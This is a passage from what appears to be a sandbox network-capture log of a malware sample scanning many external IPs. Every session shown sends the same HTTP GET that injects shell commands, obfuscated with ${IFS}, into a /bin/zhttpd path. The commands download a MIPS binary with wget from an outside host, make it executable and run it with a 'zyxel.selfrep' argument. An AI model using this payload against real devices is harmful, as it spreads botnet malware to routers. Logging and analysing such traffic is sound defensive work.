                                        3536192.168.2.134434275.230.10.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393223047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3537192.168.2.1357870113.254.209.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393296003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3538192.168.2.133849092.109.235.199443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393313885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3539192.168.2.133881659.208.255.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393359900 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3540192.168.2.1342346164.121.83.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393393040 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3541192.168.2.1353134222.162.107.142443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393445015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3542192.168.2.1349692145.80.206.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393454075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3543192.168.2.134095854.19.141.215443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393486977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3544192.168.2.135998467.155.171.250443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393516064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3545192.168.2.1341634105.188.186.166443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393615961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3546192.168.2.135472489.154.60.15443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393616915 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3547192.168.2.134095039.145.213.41443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393635035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3548192.168.2.1342870196.60.10.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393636942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3549192.168.2.1334384119.1.51.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393645048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3550192.168.2.135562823.102.144.231443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393732071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3551192.168.2.135922645.141.189.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393773079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3552192.168.2.133929239.207.68.64443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393816948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3553192.168.2.13402144.122.64.98443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393898964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3554192.168.2.133950064.27.227.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393909931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3555192.168.2.1339112162.181.247.153443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.393939972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3556192.168.2.135403674.32.116.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394004107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3557192.168.2.1348236104.197.251.107443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394035101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3558192.168.2.135758248.209.249.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394069910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3559192.168.2.1338986180.191.180.65443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394114017 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3560192.168.2.135840896.45.149.30443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394171000 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3561192.168.2.1350280126.225.231.167443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394210100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3562192.168.2.134198446.219.92.33443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394260883 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3563192.168.2.135421645.118.30.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394295931 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3564192.168.2.1349468125.103.44.233443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394328117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3565192.168.2.1360776207.23.48.175443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394351959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3566192.168.2.1357374166.18.241.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394403934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3567192.168.2.133364432.126.35.39443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394448996 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3568192.168.2.1340792130.206.206.24443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394500971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3569192.168.2.1349700132.14.208.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394527912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3570192.168.2.135044837.68.212.81443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394546032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3571192.168.2.1343298126.103.137.193443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394578934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3572192.168.2.1336004201.69.39.59443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394628048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3573192.168.2.133622458.13.204.12443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394663095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3574192.168.2.1338596175.66.227.195443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394700050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3575192.168.2.1346908104.114.228.159443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394721031 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3576192.168.2.134802680.175.110.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394773006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3577192.168.2.133945473.230.78.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394819975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3578192.168.2.1348706186.240.87.95443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394887924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3579192.168.2.1348414133.78.85.6443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394926071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3580192.168.2.1355134120.225.203.165443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.394975901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3581192.168.2.135060251.151.123.227443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395016909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3582192.168.2.1333578213.76.137.94443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395039082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3583192.168.2.1346934202.145.162.16443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395076036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3584192.168.2.1355606221.165.245.203443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395136118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3585192.168.2.135911879.39.26.31443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395147085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3586192.168.2.1349974102.188.254.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395200014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3587192.168.2.1345784119.50.45.120443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395235062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3588192.168.2.1344722134.233.39.183443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395273924 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3589192.168.2.135728635.130.205.138443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395303965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3590192.168.2.1347092135.122.139.101443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395376921 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3591192.168.2.133599462.174.68.83443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395411015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3592192.168.2.1345426171.223.137.200443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395462036 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3593192.168.2.1337438202.224.208.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395515919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3594192.168.2.1341678131.81.20.87443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395564079 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3595192.168.2.1351804199.192.19.62443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395591021 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3596192.168.2.1336530128.132.157.18443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395644903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3597192.168.2.1352828191.135.86.135443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395690918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3598192.168.2.1352552165.35.82.164443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:42.395720959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3599192.168.2.1359590156.47.238.105443
                                        TimestampBytes transferredDirectionData
